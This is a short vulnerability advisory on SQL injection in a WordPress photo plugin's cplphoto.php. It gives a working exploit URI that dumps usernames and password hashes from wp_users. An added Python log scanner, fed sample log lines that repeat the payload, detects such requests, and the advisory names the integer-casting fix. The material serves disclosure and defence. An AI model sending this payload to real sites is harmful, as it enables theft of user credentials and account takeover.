Copperleaf Photolog Plugin for WordPress 'cplphoto.php' SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/wp-content/plugins/cpl/cplphoto.php?postid=11+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=11
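For defenders, requests like the one above are visible in web-server access logs. The following is an added example, not part of the original advisory: it flags requests to cplphoto.php whose `postid` or `id` value is not a plain integer. The combined log format, the constructed sample lines, and the assumption that both parameters are meant to carry integer identifiers are ours.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2010:10:01:02 +0000] "GET /wp-content/plugins/cpl/cplphoto.php?postid=11&id=11 HTTP/1.1" 200 5120
198.51.100.9 - - [12/Mar/2010:10:03:44 +0000] "GET /wp-content/plugins/cpl/cplphoto.php?postid=11+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=11 HTTP/1.1" 200 5391
198.51.100.9 - - [12/Mar/2010:10:04:10 +0000] "GET /wp-content/plugins/cpl/cplphoto.php?postid=11%27&id=11 HTTP/1.1" 200 4000
198.51.100.3 - - [12/Mar/2010:10:05:00 +0000] "GET /index.php?postid=abc HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TARGET_SCRIPT = "/cplphoto.php"      # script named in the advisory
INT_PARAMS = ("postid", "id")        # assumption: both are integer identifiers
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_requests(log_text):
    """Return (client, parameter, decoded value) for non-integer values."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith(TARGET_SCRIPT):
            continue
        # parse_qs URL-decodes values, so '+' and %XX encodings are normalised.
        params = parse_qs(url.query, keep_blank_values=True)
        for name in INT_PARAMS:
            for value in params.get(name, []):
                if not INTEGER_RE.fullmatch(value):
                    findings.append((client, name, value))
    return findings


if __name__ == "__main__":
    for client, name, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent non-integer {name}: {value!r}")
```

The same integer-only rule is the server-side fix: a parameter that is cast to an integer, or bound through a parameterised query, cannot carry the appended SQL shown in the example URI.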


 

Copyright 2010, SecurityFocus